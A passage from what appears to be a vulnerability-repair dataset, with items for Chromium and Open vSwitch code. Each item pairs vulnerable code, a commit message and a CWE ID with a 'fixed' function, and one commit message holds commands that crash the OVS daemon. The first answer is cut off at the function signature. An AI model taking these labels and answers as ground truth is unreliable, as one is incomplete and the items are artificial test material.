!have_ext_occlusion_query_boolean && have_arb_occlusion_query && !have_arb_occlusion_query2; } if (gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || (gfx::HasExtension(extensions, 
"GL_ARB_instanced_arrays") && gfx::HasExtension(extensions, "GL_ARB_draw_instanced")) || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_ANGLE_instanced_arrays"); feature_flags_.angle_instanced_arrays = true; validators_.vertex_attribute.AddValue(GL_VERTEX_ATTRIB_ARRAY_DIVISOR_ANGLE); } bool have_es2_draw_buffers_vendor_agnostic = gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_draw_buffers") || gfx::HasExtension(extensions, "GL_EXT_draw_buffers"); bool can_emulate_es2_draw_buffers_on_es3_nv = gl_version_info_->is_es3 && gfx::HasExtension(extensions, "GL_NV_draw_buffers"); bool is_webgl_compatibility_context = gfx::HasExtension(extensions, "GL_ANGLE_webgl_compatibility"); bool have_es2_draw_buffers = !workarounds_.disable_ext_draw_buffers && (have_es2_draw_buffers_vendor_agnostic || can_emulate_es2_draw_buffers_on_es3_nv) && (context_type_ == CONTEXT_TYPE_OPENGLES2 || (context_type_ == CONTEXT_TYPE_WEBGL1 && IsWebGLDrawBuffersSupported(is_webgl_compatibility_context, depth_texture_format, depth_stencil_texture_format))); if (have_es2_draw_buffers) { AddExtensionString("GL_EXT_draw_buffers"); feature_flags_.ext_draw_buffers = true; feature_flags_.nv_draw_buffers = can_emulate_es2_draw_buffers_on_es3_nv && !have_es2_draw_buffers_vendor_agnostic; } if (IsWebGL2OrES3OrHigherContext() || have_es2_draw_buffers) { GLint max_color_attachments = 0; glGetIntegerv(GL_MAX_COLOR_ATTACHMENTS_EXT, &max_color_attachments); for (GLenum i = GL_COLOR_ATTACHMENT1_EXT; i < static_cast<GLenum>(GL_COLOR_ATTACHMENT0 + max_color_attachments); ++i) { validators_.attachment.AddValue(i); validators_.attachment_query.AddValue(i); } static_assert(GL_COLOR_ATTACHMENT0_EXT == GL_COLOR_ATTACHMENT0, "GL_COLOR_ATTACHMENT0_EXT should equal GL_COLOR_ATTACHMENT0"); validators_.g_l_state.AddValue(GL_MAX_COLOR_ATTACHMENTS_EXT); validators_.g_l_state.AddValue(GL_MAX_DRAW_BUFFERS_ARB); GLint max_draw_buffers = 0; glGetIntegerv(GL_MAX_DRAW_BUFFERS_ARB, &max_draw_buffers); for (GLenum i = GL_DRAW_BUFFER0_ARB; i < static_cast<GLenum>(GL_DRAW_BUFFER0_ARB + max_draw_buffers); ++i) { validators_.g_l_state.AddValue(i); } } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_EXT_blend_minmax") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_blend_minmax"); validators_.equation.AddValue(GL_MIN_EXT); validators_.equation.AddValue(GL_MAX_EXT); static_assert(GL_MIN_EXT == GL_MIN && GL_MAX_EXT == GL_MAX, "min & max variations must match"); } if (gfx::HasExtension(extensions, "GL_EXT_frag_depth") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_frag_depth"); feature_flags_.ext_frag_depth = true; } if (gfx::HasExtension(extensions, "GL_EXT_shader_texture_lod") || gl::HasDesktopGLFeatures()) { AddExtensionString("GL_EXT_shader_texture_lod"); feature_flags_.ext_shader_texture_lod = true; } bool ui_gl_fence_works = gl::GLFence::IsSupported(); UMA_HISTOGRAM_BOOLEAN("GPU.FenceSupport", ui_gl_fence_works); feature_flags_.map_buffer_range = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_map_buffer_range") || gfx::HasExtension(extensions, "GL_EXT_map_buffer_range"); if (has_pixel_buffers && ui_gl_fence_works && !workarounds_.disable_async_readpixels) { feature_flags_.use_async_readpixels = true; } if (gl_version_info_->is_es3 || gfx::HasExtension(extensions, "GL_ARB_sampler_objects")) { feature_flags_.enable_samplers = true; } if ((gl_version_info_->is_es3 || 
gfx::HasExtension(extensions, "GL_EXT_discard_framebuffer")) && !workarounds_.disable_discard_framebuffer) { AddExtensionString("GL_EXT_discard_framebuffer"); feature_flags_.ext_discard_framebuffer = true; } if (ui_gl_fence_works) { AddExtensionString("GL_CHROMIUM_sync_query"); feature_flags_.chromium_sync_query = true; } if (!workarounds_.disable_blend_equation_advanced) { bool blend_equation_advanced_coherent = gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced_coherent") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced_coherent"); if (blend_equation_advanced_coherent || gfx::HasExtension(extensions, "GL_NV_blend_equation_advanced") || gfx::HasExtension(extensions, "GL_KHR_blend_equation_advanced")) { const GLenum equations[] = { GL_MULTIPLY_KHR, GL_SCREEN_KHR, GL_OVERLAY_KHR, GL_DARKEN_KHR, GL_LIGHTEN_KHR, GL_COLORDODGE_KHR, GL_COLORBURN_KHR, GL_HARDLIGHT_KHR, GL_SOFTLIGHT_KHR, GL_DIFFERENCE_KHR, GL_EXCLUSION_KHR, GL_HSL_HUE_KHR, GL_HSL_SATURATION_KHR, GL_HSL_COLOR_KHR, GL_HSL_LUMINOSITY_KHR}; for (GLenum equation : equations) validators_.equation.AddValue(equation); if (blend_equation_advanced_coherent) AddExtensionString("GL_KHR_blend_equation_advanced_coherent"); AddExtensionString("GL_KHR_blend_equation_advanced"); feature_flags_.blend_equation_advanced = true; feature_flags_.blend_equation_advanced_coherent = blend_equation_advanced_coherent; } } if (gfx::HasExtension(extensions, "GL_NV_framebuffer_mixed_samples")) { AddExtensionString("GL_CHROMIUM_framebuffer_mixed_samples"); feature_flags_.chromium_framebuffer_mixed_samples = true; validators_.g_l_state.AddValue(GL_COVERAGE_MODULATION_CHROMIUM); } if (gfx::HasExtension(extensions, "GL_NV_path_rendering")) { bool has_dsa = gl_version_info_->IsAtLeastGL(4, 5) || gfx::HasExtension(extensions, "GL_EXT_direct_state_access"); bool has_piq = gl_version_info_->IsAtLeastGL(4, 3) || gfx::HasExtension(extensions, "GL_ARB_program_interface_query"); bool has_fms = feature_flags_.chromium_framebuffer_mixed_samples; if ((gl_version_info_->IsAtLeastGLES(3, 1) || (gl_version_info_->IsAtLeastGL(3, 2) && has_dsa && has_piq)) && has_fms) { AddExtensionString("GL_CHROMIUM_path_rendering"); feature_flags_.chromium_path_rendering = true; validators_.g_l_state.AddValue(GL_PATH_MODELVIEW_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_PROJECTION_MATRIX_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_FUNC_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_REF_CHROMIUM); validators_.g_l_state.AddValue(GL_PATH_STENCIL_VALUE_MASK_CHROMIUM); } } if ((gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_EXT_texture_rg") || gfx::HasExtension(extensions, "GL_ARB_texture_rg")) && IsGL_REDSupportedOnFBOs()) { feature_flags_.ext_texture_rg = true; AddExtensionString("GL_EXT_texture_rg"); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R8_EXT); validators_.texture_internal_format.AddValue(GL_RG_EXT); validators_.texture_internal_format.AddValue(GL_RG8_EXT); validators_.read_pixel_format.AddValue(GL_RED_EXT); validators_.read_pixel_format.AddValue(GL_RG_EXT); validators_.render_buffer_format.AddValue(GL_R8_EXT); validators_.render_buffer_format.AddValue(GL_RG8_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RG_EXT); 
validators_.texture_internal_format_storage.AddValue(GL_R8_EXT); validators_.texture_internal_format_storage.AddValue(GL_RG8_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_8); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::RG_88); } UMA_HISTOGRAM_BOOLEAN("GPU.TextureRG", feature_flags_.ext_texture_rg); if (gl_version_info_->is_desktop_core_profile || (gl_version_info_->IsAtLeastGL(2, 1) && gfx::HasExtension(extensions, "GL_ARB_texture_rg")) || gfx::HasExtension(extensions, "GL_EXT_texture_norm16")) { feature_flags_.ext_texture_norm16 = true; g_r16_is_present = true; validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.texture_format.AddValue(GL_RED_EXT); validators_.texture_internal_format.AddValue(GL_R16_EXT); validators_.texture_internal_format.AddValue(GL_RED_EXT); validators_.texture_unsized_internal_format.AddValue(GL_RED_EXT); validators_.texture_internal_format_storage.AddValue(GL_R16_EXT); feature_flags_.gpu_memory_buffer_formats.Add(gfx::BufferFormat::R_16); } UMA_HISTOGRAM_ENUMERATION( "GPU.TextureR16Ext_LuminanceF16", GpuTextureUMAHelper(), static_cast<int>(GpuTextureResultR16_L16::kMax) + 1); if (enable_es3 && gfx::HasExtension(extensions, "GL_EXT_window_rectangles")) { AddExtensionString("GL_EXT_window_rectangles"); feature_flags_.ext_window_rectangles = true; validators_.g_l_state.AddValue(GL_WINDOW_RECTANGLE_MODE_EXT); validators_.g_l_state.AddValue(GL_MAX_WINDOW_RECTANGLES_EXT); validators_.g_l_state.AddValue(GL_NUM_WINDOW_RECTANGLES_EXT); validators_.indexed_g_l_state.AddValue(GL_WINDOW_RECTANGLE_EXT); } bool has_opengl_dual_source_blending = gl_version_info_->IsAtLeastGL(3, 3) || (gl_version_info_->IsAtLeastGL(3, 2) && gfx::HasExtension(extensions, "GL_ARB_blend_func_extended")); if (!disable_shader_translator_ && !workarounds_.get_frag_data_info_bug && ((gl_version_info_->IsAtLeastGL(3, 2) && has_opengl_dual_source_blending) || (gl_version_info_->IsAtLeastGLES(3, 0) && gfx::HasExtension(extensions, "GL_EXT_blend_func_extended")))) { feature_flags_.ext_blend_func_extended = true; AddExtensionString("GL_EXT_blend_func_extended"); validators_.dst_blend_factor.AddValue(GL_SRC_ALPHA_SATURATE_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_ALPHA_EXT); validators_.src_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_COLOR_EXT); validators_.src_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.dst_blend_factor.AddValue(GL_ONE_MINUS_SRC1_ALPHA_EXT); validators_.g_l_state.AddValue(GL_MAX_DUAL_SOURCE_DRAW_BUFFERS_EXT); } #if !defined(OS_MACOSX) if (workarounds_.ignore_egl_sync_failures) { gl::GLFenceEGL::SetIgnoreFailures(); } #endif if (workarounds_.avoid_egl_image_target_texture_reuse) { TextureDefinition::AvoidEGLTargetTextureReuse(); } if (gl_version_info_->IsLowerThanGL(4, 3)) { feature_flags_.emulate_primitive_restart_fixed_index = true; } feature_flags_.angle_robust_client_memory = gfx::HasExtension(extensions, "GL_ANGLE_robust_client_memory"); feature_flags_.khr_debug = gl_version_info_->IsAtLeastGL(4, 3) || gl_version_info_->IsAtLeastGLES(3, 2) || gfx::HasExtension(extensions, "GL_KHR_debug"); feature_flags_.chromium_gpu_fence = gl::GLFence::IsGpuFenceSupported(); if (feature_flags_.chromium_gpu_fence) AddExtensionString("GL_CHROMIUM_gpu_fence"); 
feature_flags_.chromium_bind_generates_resource = gfx::HasExtension(extensions, "GL_CHROMIUM_bind_generates_resource"); feature_flags_.angle_webgl_compatibility = is_webgl_compatibility_context; feature_flags_.chromium_copy_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_texture"); feature_flags_.chromium_copy_compressed_texture = gfx::HasExtension(extensions, "GL_CHROMIUM_copy_compressed_texture"); feature_flags_.angle_client_arrays = gfx::HasExtension(extensions, "GL_ANGLE_client_arrays"); feature_flags_.angle_request_extension = gfx::HasExtension(extensions, "GL_ANGLE_request_extension"); feature_flags_.ext_debug_marker = gfx::HasExtension(extensions, "GL_EXT_debug_marker"); feature_flags_.arb_robustness = gfx::HasExtension(extensions, "GL_ARB_robustness"); feature_flags_.khr_robustness = gfx::HasExtension(extensions, "GL_KHR_robustness"); feature_flags_.ext_robustness = gfx::HasExtension(extensions, "GL_EXT_robustness"); feature_flags_.ext_pixel_buffer_object = gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); feature_flags_.ext_unpack_subimage = gfx::HasExtension(extensions, "GL_EXT_unpack_subimage"); feature_flags_.oes_rgb8_rgba8 = gfx::HasExtension(extensions, "GL_OES_rgb8_rgba8"); feature_flags_.angle_robust_resource_initialization = gfx::HasExtension(extensions, "GL_ANGLE_robust_resource_initialization"); feature_flags_.nv_fence = gfx::HasExtension(extensions, "GL_NV_fence"); feature_flags_.unpremultiply_and_dither_copy = !is_passthrough_cmd_decoder_; if (feature_flags_.unpremultiply_and_dither_copy) AddExtensionString("GL_CHROMIUM_unpremultiply_and_dither_copy"); feature_flags_.separate_stencil_ref_mask_writemask = !(gl_version_info_->is_d3d) && !IsWebGLContext(); if (gfx::HasExtension(extensions, "GL_MESA_framebuffer_flip_y")) { feature_flags_.mesa_framebuffer_flip_y = true; validators_.framebuffer_parameter.AddValue(GL_FRAMEBUFFER_FLIP_Y_MESA); AddExtensionString("GL_MESA_framebuffer_flip_y"); } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_OVR_multiview2")) { AddExtensionString("GL_OVR_multiview2"); feature_flags_.ovr_multiview2 = true; } if (is_passthrough_cmd_decoder_ && gfx::HasExtension(extensions, "GL_KHR_parallel_shader_compile")) { AddExtensionString("GL_KHR_parallel_shader_compile"); feature_flags_.khr_parallel_shader_compile = true; validators_.g_l_state.AddValue(GL_MAX_SHADER_COMPILER_THREADS_KHR); validators_.shader_parameter.AddValue(GL_COMPLETION_STATUS_KHR); validators_.program_parameter.AddValue(GL_COMPLETION_STATUS_KHR); AddExtensionString("GL_CHROMIUM_completion_query"); feature_flags_.chromium_completion_query = true; } if (gfx::HasExtension(extensions, "GL_KHR_robust_buffer_access_behavior")) { AddExtensionString("GL_KHR_robust_buffer_access_behavior"); feature_flags_.khr_robust_buffer_access_behavior = true; } if (!is_passthrough_cmd_decoder_ || gfx::HasExtension(extensions, "GL_ANGLE_multi_draw")) { feature_flags_.webgl_multi_draw = true; AddExtensionString("GL_WEBGL_multi_draw"); if (gfx::HasExtension(extensions, "GL_ANGLE_instanced_arrays") || feature_flags_.angle_instanced_arrays || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { feature_flags_.webgl_multi_draw_instanced = true; AddExtensionString("GL_WEBGL_multi_draw_instanced"); } } if (gfx::HasExtension(extensions, "GL_NV_internalformat_sample_query")) { feature_flags_.nv_internalformat_sample_query = true; } if (gfx::HasExtension(extensions, 
"GL_AMD_framebuffer_multisample_advanced")) { feature_flags_.amd_framebuffer_multisample_advanced = true; AddExtensionString("GL_AMD_framebuffer_multisample_advanced"); } }
172,528
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void CrosLibrary::TestApi::SetPowerLibrary(
    PowerLibrary* library, bool own) {
  library_->power_lib_.SetImpl(library, own);
}

Commit Message: chromeos: Replace copy-and-pasted code with macros.

This replaces a bunch of duplicated-per-library cros function definitions
and comments.

BUG=none
TEST=built it

Review URL: http://codereview.chromium.org/6086007

git-svn-id: svn://svn.chromium.org/chrome/trunk/src@70070 0039d316-1c4b-4281-b951-d872f2087c98

CWE ID: CWE-189
void CrosLibrary::TestApi::SetPowerLibrary(
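For context only: the commit message describes consolidating the copy-and-pasted per-library setters behind macros. The sketch below is a hypothetical illustration of that pattern — the macro name, its parameters, and its exact expansion are assumptions, not the actual Chromium change.

// Hypothetical helper macro (name and shape assumed) that stamps out one
// TestApi setter per cros library instead of hand-copying each definition.
#define DEFINE_SET_LIBRARY_IMPL(Name, Type, member)                         \
  void CrosLibrary::TestApi::Set##Name##Library(Type* library, bool own) {  \
    library_->member.SetImpl(library, own);                                 \
  }

// One line per library then replaces each duplicated function body, e.g.:
DEFINE_SET_LIBRARY_IMPL(Power, PowerLibrary, power_lib_)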
170,643
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: bool AddInitialUrlToPreconnectPrediction(const GURL& initial_url,
                                         PreconnectPrediction* prediction) {
  GURL initial_origin = initial_url.GetOrigin();
  static const int kMinSockets = 2;

  if (!prediction->requests.empty() &&
      prediction->requests.front().origin == initial_origin) {
    prediction->requests.front().num_sockets =
        std::max(prediction->requests.front().num_sockets, kMinSockets);
  } else if (initial_origin.is_valid() &&
             initial_origin.SchemeIsHTTPOrHTTPS()) {
    url::Origin origin = url::Origin::Create(initial_origin);
    prediction->requests.emplace(prediction->requests.begin(), initial_origin,
                                 kMinSockets,
                                 net::NetworkIsolationKey(origin, origin));
  }

  return !prediction->requests.empty();
}

Commit Message: Origins should be represented as url::Origin (not as GURL).

As pointed out in //docs/security/origin-vs-url.md, origins should be
represented as url::Origin (not as GURL).

This CL applies this guideline to predictor-related code and changes the
type of the following fields from GURL to url::Origin:
- OriginRequestSummary::origin
- PreconnectedRequestStats::origin
- PreconnectRequest::origin

The old code did not depend on any non-origin parts of GURL (like path
and/or query). Therefore, this CL has no intended behavior change.

Bug: 973885
Change-Id: Idd14590b4834cb9d50c74ed747b595fe1a4ba357
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1895167
Commit-Queue: Łukasz Anforowicz <lukasza@chromium.org>
Reviewed-by: Alex Ilin <alexilin@chromium.org>
Cr-Commit-Position: refs/heads/master@{#716311}

CWE ID: CWE-125
bool AddInitialUrlToPreconnectPrediction(const GURL& initial_url,
                                         PreconnectPrediction* prediction) {
  url::Origin initial_origin = url::Origin::Create(initial_url);
  static const int kMinSockets = 2;

  if (!prediction->requests.empty() &&
      prediction->requests.front().origin == initial_origin) {
    prediction->requests.front().num_sockets =
        std::max(prediction->requests.front().num_sockets, kMinSockets);
  } else if (!initial_origin.opaque() &&
             (initial_origin.scheme() == url::kHttpScheme ||
              initial_origin.scheme() == url::kHttpsScheme)) {
    prediction->requests.emplace(
        prediction->requests.begin(), initial_origin, kMinSockets,
        net::NetworkIsolationKey(initial_origin, initial_origin));
  }

  return !prediction->requests.empty();
}
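The fix above swaps the GURL-based origin for url::Origin, so equality and the NetworkIsolationKey are computed from the (scheme, host, port) triple rather than from a full URL that can still carry path and query. A minimal illustration of that distinction is sketched below; the function name and example URLs are invented for the example, while url::Origin::Create and the GURL/url::Origin comparison operators are the standard //url API.

#include "url/gurl.h"
#include "url/origin.h"

// Two URLs that differ only in path/query map to the same url::Origin.
bool SameOriginButDifferentUrl() {
  GURL a("https://example.com/index.html?q=1");
  GURL b("https://example.com/other/path");
  return a != b && url::Origin::Create(a) == url::Origin::Create(b);  // true
}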
172,369
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: OVS_REQUIRES(ofproto_mutex)
{
    const struct rule_actions *actions = rule_get_actions(rule);

    /* A rule may not be reinserted. */
    ovs_assert(rule->state == RULE_INITIALIZED);

    if (rule->hard_timeout || rule->idle_timeout) {
        ovs_list_insert(&ofproto->expirable, &rule->expirable);
    }
    cookies_insert(ofproto, rule);
    eviction_group_add_rule(rule);
    if (actions->has_meter) {
        meter_insert_rule(rule);
    }
    if (actions->has_groups) {
        const struct ofpact_group *a;

        OFPACT_FOR_EACH_TYPE_FLATTENED (a, GROUP, actions->ofpacts,
                                        actions->ofpacts_len) {
            struct ofgroup *group;

            group = ofproto_group_lookup(ofproto, a->group_id,
                                         OVS_VERSION_MAX, false);
            ovs_assert(group != NULL);
            group_add_rule(group, rule);
        }
    }

    rule->state = RULE_INSERTED;
}

Commit Message: ofproto: Fix OVS crash when reverting old flows in bundle commit

During bundle commit flows which are added in bundle are applied to ofproto
in-order. In case if a flow cannot be added (e.g. flow action is go-to
group id which does not exist), OVS tries to revert back all previous
flows which were successfully applied from the same bundle. This is
possible since OVS maintains list of old flows which were replaced by
flows from the bundle.

While reinserting old flows ovs asserts due to check on rule state !=
RULE_INITIALIZED. This will work only for new flows, but for old flow the
rule state will be RULE_REMOVED. This is causing an assert and OVS crash.

The ovs assert check should be modified to != RULE_INSERTED to prevent any
existing rule being re-inserted and allow new rules and old rules (in case
of revert) to get inserted.

Here is an example to trigger the assert:

$ ovs-vsctl add-br br-test -- set Bridge br-test datapath_type=netdev
$ cat flows.txt
flow add table=1,priority=0,in_port=2,actions=NORMAL
flow add table=1,priority=0,in_port=3,actions=NORMAL
$ ovs-ofctl dump-flows -OOpenflow13 br-test
 cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=2 actions=NORMAL
 cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=3 actions=NORMAL
$ cat flow-modify.txt
flow modify table=1,priority=0,in_port=2,actions=drop
flow modify table=1,priority=0,in_port=3,actions=group:10
$ ovs-ofctl bundle br-test flow-modify.txt -OOpenflow13

First flow rule will be modified since it is a valid rule. However second
rule is invalid since no group with id 10 exists. Bundle commit tries to
revert (insert) the first rule to old flow which results in ovs_assert at
ofproto_rule_insert__() since old rule->state = RULE_REMOVED.

Signed-off-by: Vishal Deep Ajmera <vishal.deep.ajmera@ericsson.com>
Signed-off-by: Ben Pfaff <blp@ovn.org>

CWE ID: CWE-617
OVS_REQUIRES(ofproto_mutex)
{
    const struct rule_actions *actions = rule_get_actions(rule);

    /* A rule may not be reinserted. */
    ovs_assert(rule->state != RULE_INSERTED);

    if (rule->hard_timeout || rule->idle_timeout) {
        ovs_list_insert(&ofproto->expirable, &rule->expirable);
    }
    cookies_insert(ofproto, rule);
    eviction_group_add_rule(rule);
    if (actions->has_meter) {
        meter_insert_rule(rule);
    }
    if (actions->has_groups) {
        const struct ofpact_group *a;

        OFPACT_FOR_EACH_TYPE_FLATTENED (a, GROUP, actions->ofpacts,
                                        actions->ofpacts_len) {
            struct ofgroup *group;

            group = ofproto_group_lookup(ofproto, a->group_id,
                                         OVS_VERSION_MAX, false);
            ovs_assert(group != NULL);
            group_add_rule(group, rule);
        }
    }

    rule->state = RULE_INSERTED;
}
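The functional change in the fix is only the assertion: rejecting state == RULE_INSERTED instead of requiring RULE_INITIALIZED lets both brand-new rules and old rules restored by a bundle revert (which are in RULE_REMOVED) be inserted, while still catching a true double insertion. A simplified, standalone model of that check is sketched below; the enum is a stand-in for the states named in the commit message, not the real OVS definitions.

#include <stdbool.h>

/* Stand-in for the rule lifecycle states named in the commit message. */
enum rule_state { RULE_INITIALIZED, RULE_INSERTED, RULE_REMOVED };

/* Old precondition: only freshly constructed rules pass, so re-inserting a
 * reverted rule (RULE_REMOVED) trips ovs_assert and crashes the daemon. */
static bool may_insert_old(enum rule_state s) { return s == RULE_INITIALIZED; }

/* New precondition: anything not currently inserted may be inserted, which
 * covers both new rules and rules restored during a bundle revert. */
static bool may_insert_new(enum rule_state s) { return s != RULE_INSERTED; }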
169,024